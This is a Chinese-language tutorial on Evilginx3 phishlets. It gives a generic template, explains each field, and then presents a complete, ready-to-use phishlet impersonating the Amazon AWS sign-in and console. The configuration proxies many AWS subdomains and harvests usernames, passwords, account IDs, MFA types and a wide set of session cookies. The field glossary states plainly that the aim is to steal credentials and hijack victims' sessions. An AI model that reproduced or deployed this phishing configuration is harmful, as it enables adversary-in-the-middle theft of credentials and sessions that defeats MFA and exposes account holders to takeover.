name: '您的第一个钓鱼页面'
author: 'Simpler Hacking'
min_ver: '3.2.0'
proxy_hosts:
- { phish_sub: 'www', orig_sub: 'www', domain: '{domain}', session: true, is_landing: true }
sub_filters:
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['text/html', 'application/javascript', 'text/css', 'application/json', 'image/x-icon', 'text/plain', 'application/xml', 'image/*', 'font/*']}
- { hostname: '{hostname}', sub: 'www', domain: '{domain}', search: '{domain}', replace: '{hostname}', mimes: ['application/x-www-form-urlencoded']}
auth_tokens:
- domain: '{domain}'
keys: ['session']
creds:
- key: '用户名'
search: ['(.*)']
type: 'post'
- key: '密码'
search: ['(.*)']
type: 'post'
auth_urls:
- url_regex: 'https://{hostname}/login'
valid_statuses: [200]
login:
username: 用户
password: 密码
url: https://www.{domain}/login
# 这是 3.2.0 版本的一个示例钓鱼页面
# 您可以在以下位置找到钓鱼页面:https://github.com/simplerhacking/Evilginx3-Phishlets
钓鱼页面参数说明
name:
定义钓鱼页面的名称。author:
填写钓鱼页面的作者。min_ver:
指定兼容该钓鱼页面的最小 Evilginx 版本。proxy_hosts:
表示需要代理的域名和子域。phish_sub
是被模仿的钓鱼页面的子域。sub_filters:
让钓鱼页面替换实际域名实例为钓鱼域名,这对钓鱼页面正常工作至关重要。auth_tokens:
标识应从受害者浏览器捕获的饼干,以便获取访问受害者的会话权限。creds:
此字段确定设计用来窃取的凭证。key
是凭证的名称(如用户名或密码),search
是正则表达式,程序会使用它来识别并从用户输入中提取这些详细信息。auth_urls:
规定了 Evilginx 将视为已认证 URL 的网址。在受害者登录后,如果检测到重定向到这些 URL 之一,那么将窃取列出的auth_tokens
。login:
在这里指定目标网页登录表单中的用户名和密码字段标识符,以及受害者输入凭据的页面链接。force_post:
若设置为真,则强制将 HTTP 方法从 GET 更改为 POST。is_landing:
如果设置为真,表示该页面是钓鱼攻击的着陆页。js_inject:
可以在这里编写一些 JavaScript 代码注入网页中,通常用于增强钓鱼攻击,确保受害者体验顺畅。domain:
用作模板变量,替换钓鱼配置中使用的目标主机名。
Evilginx3 模板
钓鱼页面仓库:https://github.com/simplerhacking/Evilginx3-Phishlets
name: 'Amazon'
min_ver: '3.0.0'
params:
- {name: 'accountid', default: '', required: false}
proxy_hosts:
- {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}
# subdomains updated (based on configuration)
- {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
auth_tokens:
- domain: '.amazon.com'
keys: ['aws-ubid-main', 'aws-signer-token_ap-southeast-2', 'noflush_awsccs_sid', 'aws-userInfo', 'aws-userInfo-signed', 'aws-account-alias', '.*,regexp']
- domain: '.aws.amazon.com'
keys: ['awsccc', 'aws-vid', 'aws-account-data', '.*,regexp']
- domain: '.console.aws.amazon.com'
keys: ['noflush_Region', 'noflush_awscnm', 'awsc-rac', 'aws-creds', 'aws-consoleInfo', 'aws-creds-code-verifier', 'seance', '.*,regexp']
- domain: '.signin.aws.amazon.com'
keys: ['aws-creds', 'aws-userInfo-keyBase', 'aws-mfa-entered', 'JSESSIONID', 'aws-signin-csrf', '.*,regexp']
- domain: 'phd.aws.amazon.com'
keys: ['aws-creds', 'aws-creds-code-verifier', 'aws-consoleInfo', 'seance', '.*,regexp']
credentials:
username:
key: 'username'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
custom:
- key: 'account'
search: '(.*)'
type: 'post'
- key: 'mfaType'
search: '(.*)'
type: 'post'
auth_urls:
- '/console/home'
login:
domain: 'signin.aws.amazon.com'
path: '/oauth?redirect_uri=https://console.aws.amazon.com/console/home?hashArgs=%23&isauthcode=true&client_id=arn:aws:signin:::console/canvas&response_type=code&iam_user=true{accountid}&forceMobileApp=0&code_challenge=hzU4QD5OTEZeurPpybAoADh8GnO_URqBECTzHN4CxkY&code_challenge=&code_challenge_method=SHA-256'